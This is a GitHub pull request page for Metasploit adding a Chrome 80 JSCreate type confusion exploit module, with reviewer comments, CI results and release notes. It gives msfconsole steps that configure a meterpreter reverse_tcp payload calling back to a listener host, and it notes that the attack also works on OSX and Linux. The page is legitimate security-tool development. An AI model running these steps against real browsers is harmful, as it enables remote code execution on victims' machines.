Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Google Chrome 80 JSCreate side-effect type confusion exploit #13008

Merged
merged 4 commits into from Mar 4, 2020

Conversation

@timwr
Copy link
Contributor

timwr commented Feb 29, 2020

Tested on Windows 10 running Google Chrome (64bit) 80.0.3987.87 (e.g https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/)
Thankfully(!) there is no sandbox escape, so you'll need to run Chrome with --no-sandbox

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Run the exploit:
use exploit/multi/browser/chrome_jscreate_sideeffect
set SRVHOST 192.168.56.1
set URIPATH /
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.1
run
  • Verify you get a meterpreter session
@timwr timwr added the needs-docs label Feb 29, 2020
@adamgalway-r7 adamgalway-r7 self-assigned this Mar 3, 2020
Copy link
Contributor

adamgalway-r7 left a comment

Tested and working as expected, good work! Few QOL changes, add docs, and its good to go 👍

@space-r7 space-r7 added the module label Mar 3, 2020
Co-Authored-By: adamgalway-r7 <54621924+adamgalway-r7@users.noreply.github.com>
@timwr

This comment has been minimized.

Copy link
Contributor Author

timwr commented Mar 4, 2020

So this does work identically on OSX for the same version (https://dl.google.com/release2/chrome/AJkrrB9igve6Mz4STD5utjA_80.0.3987.87/GoogleChrome-80.0.3987.87.dmg)
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --no-sandbox).
You'll need an OSX payload, e.g:
set payload osx/x64/meterpreter/reverse_tcp

@timwr

This comment has been minimized.

Copy link
Contributor Author

timwr commented Mar 4, 2020

Linux will presumably also work identically, as well as 64bit Chrome Android (Google Chrome Dev).
Supporting 32bit requires re-writing the exploit (ping @AmesianX) but that would add support for 32bit (or WOW64) Windows, as well as the stable (default) version on Android.

@timwr timwr force-pushed the timwr:cve_2020_6418 branch from 1a71be5 to fd4dcd5 Mar 4, 2020
@timwr timwr force-pushed the timwr:cve_2020_6418 branch from fd4dcd5 to 9f55e41 Mar 4, 2020
@timwr timwr removed the needs-docs label Mar 4, 2020
@adamgalway-r7 adamgalway-r7 merged commit 83132dd into rapid7:master Mar 4, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@adamgalway-r7

This comment has been minimized.

Copy link
Contributor

adamgalway-r7 commented Mar 4, 2020

Release Notes

Adds an exploit module for Google Chrome 80. Module starts webpage hosting malicious JavaScript that when visited by a vulnerable version of Chrome allows Remote Code Execution on a remote machine. Currently only possible with --no-sandbox Chrome flag in use.

@Vikec

This comment has been minimized.

Copy link

Vikec commented Mar 14, 2020

Why not run on Chrome 79

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Mar 14, 2020

Why not run on Chrome 79

This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The browser must be run with the --no-sandbox option for the payload to work correctly.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

5 participants
You can’t perform that action at this time.